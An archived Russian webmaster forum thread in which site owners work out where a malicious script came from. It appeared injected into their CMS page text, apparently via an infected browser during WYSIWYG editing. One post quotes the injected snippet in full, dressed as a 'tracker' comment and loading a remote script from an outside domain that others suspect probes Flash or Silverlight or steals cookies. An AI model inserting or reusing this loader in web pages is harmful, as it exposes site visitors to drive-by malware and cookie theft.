PDA

Просмотр полной версии : JS Скрипт


TF-Studio
12.11.2015, 11:55
на сайте появляется скрипт в текстах.
пока выясняем каким образом он там находится (редактор, админка, взлом...)
хочется понять что за код
http://vegetatika.ru/t.js
что он делает? на сколько небезопасен

metadon.info
12.11.2015, 12:05
По идее просто загружает в iframe другой сайт, а там могут быть вирусы или сливают трафик с вашего

LEOnidUKG
12.11.2015, 12:09
Там всё просто.
Он подгружает iframe в нём скрипт:
http://sos.vegetatika.ru/

В этом скрипте:
http://sos.vegetatika.ru/iframe.js

Далее упорно ищет флэш плеер или сильвер от IE. Далее закодированный код,скорее всего там урлы прописаны, с которых надо что-то подгружать.

Вполне возможно эти вирусы ищут именно дырки во флэше и в сильвере для подгрузки вируса уже клиенту.

Tibald
12.11.2015, 18:24
У вас на какой цмс сайт?

У меня сегодня этот скрипт тоже вылез у копирайтера. Но как бы странно, что у меня его не видно. А у нее вставляется в текст сайта описания товара после сохранения wysiwyg редактором.

Т.е. как будто вирус на ее машине, который при редактировании форм через wysiwyg добавляет туда подключение скрипта.

В поиске видно, как люди комментарии оставляли и тоже дописывали этот скрипт.
http://i.imgur.com/BcMPkEx.png

levchernenko
12.11.2015, 20:20
могу ошибаться, но мне кажется, что скрипт куки ворует и во фрейм выгружает

kgtu5
12.11.2015, 21:19
то что он в коде обозначен счетчиком
<!-- Vegetatika.ru tracker -->
<script type="text/javascript">
(function(d,b,ce,ac) {
var a=d[ce]("script");a.type="text/javascript";a.async=!0;
a.src="//vegetatika. ru/t.js";d[b][ac](a);
})(document,'body','createElement','appendChild');
</script>
<!-- /Vegetatika.ru tracker -->
это нормально?

TF-Studio
12.11.2015, 22:06
У вас на какой цмс сайт?

У меня сегодня этот скрипт тоже вылез у копирайтера. Но как бы странно, что у меня его не видно. А у нее вставляется в текст сайта описания товара после сохранения wysiwyg редактором.

Т.е. как будто вирус на ее машине, который при редактировании форм через wysiwyg добавляет туда подключение скрипта.

В поиске видно, как люди комментарии оставляли и тоже дописывали этот скрипт.
http://i.imgur.com/BcMPkEx.png

Есть такое предположение.
Diafan в данном случае.
но лишь на 1 сайте.
в анонс и текст лезет.

Tibald
12.11.2015, 23:01
Сайт проверил айболитом - чисты.
CMS Prestashop у нее баг вылазил именно при отправке формы.
Когда отправляет форму в хроме - то делается приписка с вставкой скрипта.
Удалила хром, поставила оперу - проблема исправилась.
У нас на сайте текст нигде не вылез, по тому, что Prestashop не давало сохранить форму в таком виде. Так мы и обнаружили сразу проблему эту. Т.е. она сохраняет описание к товару, а ей преста говорит: Не верное поле Description - смотри исходный код поля, а там уже скрипт вставлен) Ну с оперы все норма стало. В хроме - расширений лишних не было , авастовский клинер браузеров не нашел ничего, CureIT тоже ничего не нашел.

А так проверить же легко. Сохраните в редакторе ЦМС текст с того ПК откуда это обычно делается и посмотрите в исходник.